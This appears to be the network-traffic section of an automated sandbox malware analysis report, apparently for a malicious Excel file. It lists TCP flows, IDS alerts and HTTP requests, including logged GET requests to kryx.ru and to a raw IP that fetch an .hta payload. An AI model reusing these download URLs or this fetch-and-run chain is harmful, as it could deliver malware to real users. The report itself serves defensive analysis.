Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58543
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58543
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58544
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58544
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58544
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58543
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58544
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58544
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58543
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58543
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58544
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58544
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58544
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58544
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58543
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58543
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58544
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58544
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58543
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58543
Source: global trafficTCP traffic: 192.168.2.9:58539 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.9:58539
Source: global trafficTCP traffic: 192.168.2.9:58531 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 13.107.253.72 13.107.253.72
Source: Joe Sandbox ViewIP Address: 198.12.89.24 198.12.89.24
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:58542 -> 13.107.253.72:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:58544 -> 13.107.253.72:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficHTTP traffic detected: GET /e3EPl0?&certification=exclusive&kitty=thinkable HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: kryx.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/angel/cesgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /e3EPl0?&certification=exclusive&kitty=thinkable HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: kryx.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
